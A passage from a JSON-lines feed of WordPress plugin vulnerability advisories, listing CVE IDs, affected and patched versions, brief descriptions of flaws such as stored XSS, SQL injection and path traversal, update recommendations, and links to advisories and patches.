version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a83e68e0-1b5b-4fd5-be00-37b8f11144c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a83e68e0-1b5b-4fd5-be00-37b8f11144c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-builder\\\/tags\\\/7.6.2\\\/classes\\\/class-themify-builder-model.php#L1121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-builder\\\/tags\\\/7.6.2\\\/classes\\\/class-themify-builder-model.php#L1121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162399\\\/themify-builder\\\/trunk\\\/classes\\\/class-themify-builder-model.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162399\\\/themify-builder\\\/trunk\\\/classes\\\/class-themify-builder-model.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6636","slug":"greenshift-animation-and-page-builder-blocks","versionImpact":"7.6.2","versionEndExcluding":"7.6.3","description":"The Greenshift \u2013 animation and page builder blocks plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation on the 'gspb_save_files' function in versions up to, and including, 7.6.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/821462d6-970e-4e3e-b91d-e7153296ba9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/821462d6-970e-4e3e-b91d-e7153296ba9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php?rev=3006373#L867\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php?rev=3006373#L867\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009030\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3009030\\\/greenshift-animation-and-page-builder-blocks\\\/trunk\\\/settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9488","slug":"wpdiscuz","versionImpact":"7.6.24","versionEndExcluding":"7.6.25","description":"The Comments \u2013 wpDiscuz plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.6.24. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 7.6.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b71706a7-e101-4d50-a2da-1aeeaf07cf4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b71706a7-e101-4d50-a2da-1aeeaf07cf4b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/forms\\\/wpdFormAttr\\\/Login\\\/SocialLogin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/forms\\\/wpdFormAttr\\\/Login\\\/SocialLogin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164486\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164486\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6704","slug":"wpdiscuz","versionImpact":"7.6.21","versionEndExcluding":"7.6.22","description":"The Comments \u2013 wpDiscuz plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 7.6.21. This is due to a lack of filtering of HTML tags in comments. This makes it possible for unauthenticated attackers to add HTML such as hyperlinks to comments when rich editing is disabled.","recommendation":"Update to version 7.6.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa3501a4-7975-4f90-8037-f8a06c293c07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa3501a4-7975-4f90-8037-f8a06c293c07?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/class.WpdiscuzCore.php#L335\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdiscuz\\\/trunk\\\/class.WpdiscuzCore.php#L335\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124810\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124810\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3934","slug":"woocommerce-mercadopago","versionImpact":"7.6.1","versionEndExcluding":"7.6.2","description":"The Mercado Pago payments for WooCommerce plugin for WordPress is vulnerable to Path Traversal in versions 7.3.0 to 7.5.1 via the mercadopagoDownloadLog function. This makes it possible for authenticated attackers, with subscriber-level access and above, to download and read the contents of arbitrary files on the server, which can contain sensitive information. The arbitrary file download was patched in 7.5.1, while the missing authorization was corrected in version 7.6.2.","recommendation":"Update to version 7.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1674e81e-6a75-436c-b219-8ec0a484a134?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1674e81e-6a75-436c-b219-8ec0a484a134?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-mercadopago\\\/trunk\\\/src\\\/Admin\\\/Settings.php#L663\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-mercadopago\\\/trunk\\\/src\\\/Admin\\\/Settings.php#L663\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098023\\\/woocommerce-mercadopago\\\/trunk\\\/src\\\/IO\\\/Downloader.php?old=3078706&old_path=woocommerce-mercadopago%2Ftrunk%2Fsrc%2FIO%2FDownloader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098023\\\/woocommerce-mercadopago\\\/trunk\\\/src\\\/IO\\\/Downloader.php?old=3078706&old_path=woocommerce-mercadopago%2Ftrunk%2Fsrc%2FIO%2FDownloader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119214\\\/woocommerce-mercadopago\\\/tags\\\/7.6.2\\\/src\\\/IO\\\/Downloader.php?old=3108278&old_path=woocommerce-mercadopago%2Ftags%2F7.6.1%2Fsrc%2FIO%2FDownloader.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119214\\\/woocommerce-mercadopago\\\/tags\\\/7.6.2\\\/src\\\/IO\\\/Downloader.php?old=3108278&old_path=woocommerce-mercadopago%2Ftags%2F7.6.1%2Fsrc%2FIO%2FDownloader.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7836","slug":"themify-builder","versionImpact":"7.6.1","versionEndExcluding":"7.6.2","description":"The Themify Builder plugin for WordPress is vulnerable to unauthorized post duplication due to missing checks on the duplicate_page_ajaxify function in all versions up to, and including, 7.6.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate and view private or draft posts created by other users that otherwise shouldn't be accessible to them.","recommendation":"Update to version 7.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31dfc46c-a673-41f1-b701-aa832f004ebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31dfc46c-a673-41f1-b701-aa832f004ebc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-builder\\\/tags\\\/7.6.1\\\/classes\\\/class-builder-duplicate-page.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-builder\\\/tags\\\/7.6.1\\\/classes\\\/class-builder-duplicate-page.php#L41\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13685","slug":"admin-site-enhancements","versionImpact":"7.6.9","versionEndExcluding":"7.6.10","description":"The Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate their value to bypass the login limit feature in the Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10.","recommendation":"Update to version 7.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72c61904-253d-42d1-9edd-7ea2162a2f85\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/72c61904-253d-42d1-9edd-7ea2162a2f85\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13688","slug":"admin-site-enhancements","versionImpact":"7.6.9","versionEndExcluding":"7.6.10","description":"The Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10 uses a hardcoded password in its Password Protection feature, allowing attacker to bypass the protection offered via a crafted request","recommendation":"Update to version 7.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19051d08-16b0-466c-976b-be7b076e8e92\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19051d08-16b0-466c-976b-be7b076e8e92\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25455","slug":"miniorange-login-openid","versionImpact":"7.6.0","versionEndExcluding":"7.6.1","description":"Missing Authorization vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn): from n\/a through 7.6.0.","recommendation":"Update to version 7.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-6-0-arbitrary-content-deletion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-6-0-arbitrary-content-deletion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1842","slug":"js_composer","versionImpact":"7.5","versionEndExcluding":"7.6","description":"The wpbakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Heading tag attribute in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/674e6722-d293-4572-80bf-984e74c3e33f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/674e6722-d293-4572-80bf-984e74c3e33f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1841","slug":"js_composer","versionImpact":"7.5","versionEndExcluding":"7.6","description":"The wpbakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Title tag attribute in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34d21418-4faf-40bf-a960-79482a592722?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34d21418-4faf-40bf-a960-79482a592722?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1840","slug":"js_composer","versionImpact":"7.5","versionEndExcluding":"7.6","description":"The wpbakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Author tag attribute in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb8ecbbc-ada9-4887-92e6-25a587ecfb84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb8ecbbc-ada9-4887-92e6-25a587ecfb84?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1805","slug":"js_composer","versionImpact":"7.5","versionEndExcluding":"7.6","description":"The wpbakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button onclick attribute in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a571386-fae1-4a56-8567-9d3e23249de1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a571386-fae1-4a56-8567-9d3e23249de1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"name\":\"https:\\\/\\\/kb.wpbakery.com\\\/docs\\\/preface\\\/release-notes\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5220","slug":"nd-shortcodes","versionImpact":"7.5","versionEndExcluding":"7.6","description":"The ND Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's upload feature in all versions up to, and including, 7.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cbd6040-0446-41fe-8fef-c9065beeaa3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5cbd6040-0446-41fe-8fef-c9065beeaa3a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-shortcodes\\\/tags\\\/7.3\\\/nd-shortcodes.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nd-shortcodes\\\/tags\\\/7.3\\\/nd-shortcodes.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091778\\\/nd-shortcodes\\\/trunk\\\/nd-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091778\\\/nd-shortcodes\\\/trunk\\\/nd-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1134","slug":"wp-seopress","versionImpact":"7.5.2.1","versionEndExcluding":"7.6","description":"The SEOPress \u2013 On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SEO title and description parameters as well as others in all versions up to, and including, 7.5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc3910e4-649f-45ab-876a-a4b04afac8d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc3910e4-649f-45ab-876a-a4b04afac8d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056025%40wp-seopress%2Ftrunk&old=3047913%40wp-seopress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056025%40wp-seopress%2Ftrunk&old=3047913%40wp-seopress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3032","slug":"themify-builder","versionImpact":"7.5.7","versionEndExcluding":"7.5.8","description":"Themify Builder WordPress plugin before 7.5.8 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue","recommendation":"Update to version 7.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d130a60c-c36b-4994-9b0e-e52cd7f99387\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d130a60c-c36b-4994-9b0e-e52cd7f99387\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1889","slug":"directorist","versionEndExcluding":"7.5.5","description":"The Directorist plugin for WordPress is vulnerable to an Insecure Direct Object Reference in versions up to, and including, 7.5.4. This is due to improper validation and authorization checks within the listing_task function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b47edd57-cac7-463f-88cc-8922f1b34612?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b47edd57-cac7-463f-88cc-8922f1b34612?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920100\\\/directorist\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920100\\\/directorist\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1888","slug":"directorist","versionEndExcluding":"7.5.5","description":"The Directorist plugin for WordPress is vulnerable to an arbitrary user password reset in versions up to, and including, 7.5.4. This is due to a lack of validation checks within login.php. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to reset the password of an arbitrary user and gain elevated (e.g., administrator) privileges.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01943559-e05b-4dca-b322-d880b2729ee7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01943559-e05b-4dca-b322-d880b2729ee7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920100\\\/directorist\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920100\\\/directorist\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6338","slug":"fv-wordpress-flowplayer","versionImpact":"7.5.46.7212","versionEndExcluding":"7.5.47.7212","description":"The FV Flowplayer Video Player plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018exclude\u2019 parameter in all versions up to, and including, 7.5.46.7212 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4185a0e-d944-408f-8a43-8f9c6bc3964d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4185a0e-d944-408f-8a43-8f9c6bc3964d?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fv-wordpress-flowplayer\\\/trunk\\\/models\\\/video-encoder\\\/class.fv-player-encoder-list-table.php#L308\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fv-wordpress-flowplayer\\\/trunk\\\/models\\\/video-encoder\\\/class.fv-player-encoder-list-table.php#L308\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fv-wordpress-flowplayer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fv-wordpress-flowplayer\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121532\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121532\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2023-2252","slug":"directorist","versionImpact":"7.5.3","versionEndExcluding":"7.5.4","description":"The Directorist WordPress plugin before 7.5.4 is vulnerable to Local File Inclusion as it does not validate the file parameter when importing CSV files.","recommendation":"Update to version 7.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9da6eede-10d0-4609-8b97-4a5d38fa8e69\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9da6eede-10d0-4609-8b97-4a5d38fa8e69\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23706","slug":"miniorange-login-openid","versionEndExcluding":"7.5.15","description":"Cross-Site Request Forgery (CSRF) vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin <=\u00a07.5.14 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24375","slug":"miniorange-login-openid","versionImpact":"7.5.12","versionEndExcluding":"7.5.13","description":"Missing Authorization vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn): from n\/a through 7.5.14.","recommendation":"Update to version 7.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-broken-access-control?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-broken-access-control?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3635","slug":"the-post-grid","versionImpact":"7.4.3","versionEndExcluding":"7.5.0","description":"The Post Grid  WordPress plugin before 7.5.0 does not sanitise and escape some of its Grid settings, which could allow high privilege users such as Editor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 7.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/63cbe5f4-fe0f-499f-a964-cf4fbedcfa25\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/63cbe5f4-fe0f-499f-a964-cf4fbedcfa25\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6160","slug":"lifterlms","versionImpact":"7.4.2","versionEndExcluding":"7.5.0","description":"The LifterLMS \u2013 WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 7.4.2 via the maybe_serve_export function. This makes it possible for authenticated attackers, with administrator or LMS manager access and above, to read the contents of arbitrary CSV files on the server, which can contain sensitive information as well as removing those files from the server.","recommendation":"Update to version 7.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d0fcd82-6d4a-454f-8056-a896e8d41d00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d0fcd82-6d4a-454f-8056-a896e8d41d00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989461\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989461\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13587","slug":"zigaform-calculator-cost-estimation-form-builder-lite","versionImpact":"7.4.7","versionEndExcluding":"7.4.8","description":"The Zigaform \u2013 Price Calculator & Cost Estimation Form Builder Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zgfm_fvar' shortcode in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zigaform-calculator-cost-estimation-form-builder-lite\\\/trunk\\\/modules\\\/formbuilder\\\/controllers\\\/uiform-fb-controller-frontend.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zigaform-calculator-cost-estimation-form-builder-lite\\\/trunk\\\/modules\\\/formbuilder\\\/controllers\\\/uiform-fb-controller-frontend.php#L999\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0946fab3-6299-4f62-9664-c0a049e2dbb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0946fab3-6299-4f62-9664-c0a049e2dbb3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
